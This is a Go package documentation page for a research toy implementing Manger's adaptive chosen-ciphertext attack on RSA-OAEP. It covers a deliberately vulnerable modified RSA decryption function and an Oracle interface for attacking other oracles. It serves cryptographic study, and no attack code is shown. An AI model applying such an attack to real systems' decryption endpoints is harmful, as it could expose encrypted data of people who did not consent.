go-manger-attack

module

v0.0.0-...-5424261 Latest Latest Go to latest Published: Feb 5, 2018 License: CC0-1.0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/AnomalRoil/go-manger-attack

Links

Open Source Insights

README ¶

go-manger-attack

This is a toy implementation in Go of the well-known chosen-ciphertext attack against RSA-OAEP found by Manger.

James Manger showed that, despite being formally secure, normal implementations of PKCS #1 v2.0 RSA-OAEP decoding were vulnerable to an adaptive chosen ciphertext attack, whose principle is relatively simple.

The present repo is an implementation of that attack in Go, against a modified, vulnerable RSA-OAEP decryption function instead of the one from the crypto/rsa package. The current crypto/rsa package implementation may have a timing discrepancy in the leftPad function which could lead to Manger attack, but if it does, then the signal is too low to be exploitable, even locally (according to my benchmarks).

To test it

You can use the modded RSA library I included to test the code by simply running:

go test -v ./mangerattack -run TestOracleWithModdedRSA

To use it with your own oracle

You can call this as a package and provide the MangerAttack(Oracle) function with your oracle. It needs to satisfy the interface "Oracle" so that it accepts a Decrypt(*big.Int) function that will send the said big Integer to the oracle, and a Query() bool function that will provide your oracle's answer whether the decrypted plaintext is >= B (true, then is has no leading 0 after decryption) or not (false, it has one or more leading zeros after decryption).

An example is provided in attack_test.go that uses Go's "blackbox testing" to show how to implement the interface.

Intellectual property

rsa.go and parts of utils.go are copyright The Go Authors, with modifications copyright Nagravision SA.

Directories ¶

Path	Synopsis
mangerattack This contains modified copies of some of the code from the Go crypto package all credits goes to The Go Authors, it follows a BSD-style licence that can be found in the GO_LICENSE file	This contains modified copies of some of the code from the Go crypto package all credits goes to The Go Authors, it follows a BSD-style licence that can be found in the GO_LICENSE file
moddedrsa Its purpose is to demonstrate that the current crypto/rsa library is at least partially vulnerable to Manger attacks, cf.	Its purpose is to demonstrate that the current crypto/rsa library is at least partially vulnerable to Manger attacks, cf.

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL